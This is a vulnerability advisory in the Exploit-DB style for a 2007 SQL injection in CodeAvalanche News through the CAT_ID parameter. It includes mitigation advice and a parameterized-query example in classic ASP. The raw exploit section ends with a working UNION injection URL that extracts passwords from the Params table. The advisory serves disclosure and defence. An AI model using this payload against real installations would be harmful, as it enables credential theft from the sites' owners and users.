Vendor: CodeAvalanche News
By: beks
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: CodeAvalanche News
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

CodeAvalanche News SQL Injection

The vulnerability allows an attacker to execute arbitrary SQL queries against the CodeAvalanche News database by injecting SQL through the 'CAT_ID' parameter of the 'inc_listnews.asp' script, which passes the value into a query without validation or parameter binding. This can lead to unauthorized access, data theft, and potentially full control of the application and the underlying database.

Mitigation:

The vendor should validate user input and use parameterized queries so that request values can never alter the structure of a SQL statement. Additionally, keeping the software updated to the latest available version is recommended.
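The following classic ASP fragment is an added example of the mitigation described above; it is not code from CodeAvalanche News. It assumes a table `News` with columns `CAT_ID` and `Title` and a connection string stored in `Application("ConnString")`, and it shows the hardened lookup beside a comment describing the concatenation pattern the advisory exploits.

```vbscript
<%
' Added example, not the original inc_listnews.asp. Table and column
' names (News, CAT_ID, Title) and Application("ConnString") are assumed.
Option Explicit

Function SafeCatId(raw)
    ' CAT_ID is a numeric category id, so accept only a plain
    ' non-negative integer and reject everything else before any SQL.
    Dim re
    Set re = New RegExp
    re.Pattern = "^\d{1,9}$"
    If re.Test(raw) Then
        SafeCatId = CLng(raw)
    Else
        SafeCatId = -1
    End If
End Function

Dim catId, conn, cmd, rs
catId = SafeCatId(Request.QueryString("CAT_ID"))
If catId < 0 Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid category."
    Response.End
End If

' Pattern the advisory describes (do not use): the raw request value is
' spliced into the statement, so a UNION clause supplied in CAT_ID
' becomes part of the query.
'   sql = "SELECT Title FROM News WHERE CAT_ID=" & Request.QueryString("CAT_ID")

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("ConnString")  ' assumed application setting

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = 1  ' adCmdText
cmd.CommandText = "SELECT Title FROM News WHERE CAT_ID = ?"
' adInteger = 3, adParamInput = 1: the value travels as a typed
' parameter and cannot change the statement structure.
cmd.Parameters.Append cmd.CreateParameter("CatId", 3, 1, , catId)

Set rs = cmd.Execute
Do While Not rs.EOF
    Response.Write Server.HTMLEncode(rs("Title")) & "<br>"
    rs.MoveNext
Loop
rs.Close : conn.Close
%>
```

The integer check alone would already block the payload shown below; the bound parameter protects the query even when the input format is later relaxed.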

Exploit-DB raw data:

#CodeAvalanche News SQL Injection#

Software: CodeAvalanche News

Download: http://www.aspindir.com/indir.asp?id=3315

Risk: High

Found by: beks

http://target/[path]/inc_listnews.asp?CAT_ID=17+union+select+0,0,0,0,Password+from+Params

# milw0rm.com [2007-02-15]